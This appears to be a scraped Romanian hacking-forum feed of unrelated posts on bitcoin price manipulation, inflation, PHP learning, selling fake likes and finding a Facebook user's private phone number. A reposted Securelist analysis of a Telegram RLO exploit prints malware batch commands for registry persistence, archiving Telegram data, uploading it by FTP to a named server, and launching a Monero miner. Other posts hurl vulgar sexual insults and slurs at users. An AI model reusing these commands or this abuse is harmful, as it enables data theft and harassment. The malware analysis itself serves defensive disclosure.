Leaderboard

Cetinel, cetinel

@mariuss615Exista posibilitatea ca balenele sa isi faca un cartel? E o combinatie win-win ca sa scoata mai multi jucatori cu sume mici din joc. Plus ca eu daca scot la vanzare 1000000 btc nu inseamna ca ii si vand.

Pai ideea nu e sa le vinzi, ci sa le scoti pe piata. Doar scoaterea la vanzare scade valoarea. Ca se ofera mai multi bitcoini pentru aceeasi cerere. Doar cresterea ofertei cand cererea ramane constanta face ca pretul sa scada.

Mintea mea imi spune ca este plauzibil doar daca gasesti cumparatori intr-un timp scurt, iar pentru o cantitate asa mare slabe sanse. Daca vinde pe bucati pretul cu fiecare bucata vanduta va scadea. Apoi depinde ce fac cumparatorii cu moneda, daca si ei o tin la saltea (mai mult ca sigur) toata schema pica pentru ca valoarea monedei va urca intr-un timp scurt (tot nu se vor gasi in piata acei btc vanduti) si el nu va gasi de unde sa cumpere iar 1mil de btc la un pret mic. Exista si varianta ca aceasta vanzare sa creeze o panica si mai toata lumea sa vanda si atunci sansele lui cresc. Au mai fost cazuri cand creatorii monedelor ce detineau 30-40% din toate moneda existenta au vandut si pretul nu a fost influentat asa mult.

Intrebare: dc cineva detine 1.000.000 de bitcoini si ii tine la ciorap=> cf. Cerere-oferta creste valoarea ca nu sunt lichiditati pe piata. Daca ala vrea sa faca mai multi bani trebuie doar sa le dea drumul pe piata => va exploda oferta, pretul va scadea drastic, apoi el va avea bani sa cumpere si mai mult, profitand la maxim de pozitia privilegiata pe care o are. E plauzibil?

hackerman la 12 ani. in loc sa faci dume proaste cu acea persoana, ca de aia ii vrei numarul, ca esti retardat cu probleme mintale si n-ai ce face cu viata ta, mai bine vezi-ti de scoala.

Added support for Chrome 64 (only 64 bits right now).

Mi-am amintit de Cem Paya, ala care a lucrat initial la google wallet. Dc va intereseaza blogul omului https://randomoracle.wordpress.com/author/cemp/

Sursa: https://securelist.com/zero-day-vulnerability-in-telegram/83800/ The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse. Launching an attack on Telegram Below is an account of how this vulnerability was exploited in Telegram: The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows: evil.js -> photo_high_re*U+202E*gnp.js Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js. The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file: When the user clicks on this file, the standard Windows security notification is displayed: Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched. Exploitation in the wild After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios. Remote control The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules. Attack flowchart At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol: With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled: When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment: Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian: The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below: Command (English translation) Function “Онлайн (“Online) Send list of files in directory to control bot. “Запус (“Launch) Launch executable file using Process.Start(). “Логгер (“Logger) Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content. “Скачать (“Download) Download file into its own directory. “Удалить (“Delete) Delete file from its own directory. “Распаковать (“Unpack) Unpack archive in its own directory using specified password. Убить (Kill) Terminate specified process using process.Kill() Скачат (Download) Same as ‘Download’ (see above), with different command parsing. Запуск (Launch) Same as ‘Launch’ (see above), with different command parsing. Удалить (Delete) Same as ‘Delete’ (see above), with different command parsing. Распаковать (Unpack) Same as ‘Unpack’ (see above), with different command parsing. Процессы (Processes) Send a list of commands running on target PC to control bot. An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user. Miners and more Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet. Scenario #1 Attack flowchart At the first stage of the attack, an SFX archive with a script is used that launches an executable file: Path=%temp%\adr Setup=%temp%\adr\run.exe Silent=1 Overwrite=2 This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this: As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security. Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive. nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator: taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path: We have seen several versions of this batch script, some of which have extra features: This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access: The attack flowchart is approximately as follows: We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware. The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents: All components named st*.exe are executable PE files converted in a similar way from batch scripts. The SFX script launches the component st1.exe: Path=%temp%/adress Setup=%temp%/adress/st1.exe Silent=1 Overwrite=2 st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry: reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f So the st2.exe file launches when system is booted next time: TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch chcp 1251 tskill telegram taskkill /IM telegram.exe #Terminates Telegram processes md %temp%\sss cd %temp%\sss #Creates a temporary directory “%temp%\adress\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\sss\1.rar” “%appdata%\Telegram Desktop” #Packs the Telegram directory into a RAR archive TIMEOUT /T 60 /NOBREAK :begin ping -n 1 ya.ru |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier: @echo XXXXXXXX>command.txt @echo XXXXXXXX>>command.txt @echo binary>>command.txt @echo mput %temp%\sss\*.rar>>command.txt @echo quit>>command.txt ftp -s:command.txt -i free11.beget.com del command.txt attrib %temp%/adress +H attrib %temp%/adress\* +H On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims: Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos. Scenario #2 Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload: The payload is an SFX archive with the following script: svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed. The script contains the appropriate comments: The miner itself is launched as follows: WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, 0 The pool address is associated with the cryptocurrency Monero. On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:

... et pour la bonne bouche... p.s. pentru ce ne ptiveste aici ... si e nasol, sintem la remorca altora, daca ei se prabusesc, noi ne zdrobim, antrenati in inertia caderii lor...

Nu e chiar asa.. bani se pot imprima oricand.. dar treaba e ca daca sunt mai multi (la modul extrem de a dubla toti banii din lume) o sa fie acelasi cacat pentru ca valoare bacnotei o sa fie mai putina.. adica daca ai salariul acum de 100 de euro si o paine e 1 euro, dupa ce se dubleaza banii o sa ai salariud de 200 euro si painea o sa coste 2 euro.. in ritmul asta o sa ajungem sa platim o suta de mii de euro pe o paine si sa avem salarii de milioane de euro. Dupa o sa apara moneda euro-new care 1 euro-new o sa coste 100.000 euro, si schimbam din nou, ca de la lei vechi la lei noi (ca si exemplu). Si asa mereu si mereu ca intro bucla. Banii nu dispar, nu se pierd, avem aceeasi suma de bani "globala", doar ca suntem din ce in ce mai multi care ne gandim cum sa ne luam bucatia de acolo ca sa fim milionari si sa ii tinem la saltea. In cazul asta cum in circulatie sunt mai putini bani atunci valoare lor tinde sa creasca, si acolo apare saracia Pentru ca daca toata lumea ia salariu dublu, ala de unde cumperi tigari urca pretu ca vrea si el mai multi bani, si tot asa... Banii sunt un produs care are o valoare, exact ca un litru de benzina. Daca avem bacnote mai multe (aka banii mai multi) valoarea lor scade, exact ca si cand avem mai multa benzina, costa mai ieftin. Nu stiu, daca m-am explicat sau daca ma intelegi...

@individual14XX Oricand ^__^ Nu e nevoie sa devii un guru al PHP-ul(sau al oricarui alt limbaj) inainte sa te apuci de proiect, numai sa simti cum merge si ce posibilitati are limbaju'/paradigma(OOP si procedurala), dupa care sa iti faci un design(schema) initial cu ce lucruri ai nevoie si dupa daca ceva nu merge la unul dintre ele sau nu stii de unde sa le apuci bagi research, cauti ce functii care te-ar ajuta exista(nu te apuca sa reinventezi roata, desi amuzant, uneori mananca timp si s-ar putea s-o faci mai prost ca ce e deja in limbaj/librarie) etc. Incearca sa nu ramai impotmolit in lucruri de genul "ah, nu-mi iese nustiuce pe care l-am facut nustiucum" aka sa nu-ti fie frica sau lene sa stergi bucata aia de cod sa refaci de la 0 eventual in alt mod care ar merge. Also, desginu' initial, am zis initial pentru ca probabil o sa-l schimbi o sa mai adaugi/scoti lucruri, nu e ceva fix cand faci un proiect de capul tau fara specificatii, doar sa nu o dai nici in extrema cealalta si sa ajungi sa ai o shaorma cu de toate. O sa ma opresc acum,deja o dau in offtopic, bafta in continuare ^___^

repost. am postat mai jos cu 2

http://books.goalkicker.com/

Am o lista cu minim 10. Cred ca am 25-30 de site-uri. Daca esti interesat, imi poti da PM , ca sa nu fac reclama aici fiecare baga in jur de 150-200 la 15 minute. O singura data daca dai start la toate 25 odata, 200 x 25 = 5000 likeuri din prima. Intr-o ora 20.000 likeuri. peace

Iti dau eu un final " answer :... la cat esti de mandru nici romaneste nu mai vrei sa scrii....Toata treaba e ca tu esti un mare PROST ...ai incercat sa te dai mare pe RoForum.. si nu ti-a mers ... ai plans prin PM-uri pe la toata lumea ..cat esti de prost ...si acuma ai venit aici cu ceva ce TU..marele prost nu o sa intelegi niciodata ... ..si sti dece ? Pentru ca tu habar nu ai ce inseamna o echipa ...habar nu ai ce inseamna sa iti doresti ceva cu adevarat... .Tu..marele Prost habar nu ai sa iti cumperi un BTC .. dar vorbesti ..despre alti...despre munca altora ....asta arata cat de mare PROST esti. final answer coaie PS: La cat de mult contezi tu pentru lumea asta...ma mir ca ai primit 2 raspunsuri. Cred ca acuma te simti cineva..esti bagat in seama. Incearca sa fi barbat si nu mai plage atata..pune mana si construieste ceva ... realizeaza ceva .. nu te mai uita in gura la alti... ...final answer coaie Multa muie merita ..mamuca ta aia frumoasa...de sotie nu mai zic..ca si asa isi ia portia zilnic. Hai pa..ca m-am distrat cu voi. Eduard..capu sus...Nu te vom uita....firimiturile intodeauna vor fi pentru tine PROSTULE.

The PDF is not there anymore...

Stie cineva cum pot afla un numar de telefon al unei persoane de pe facebook, daca ea nu-l are pe public?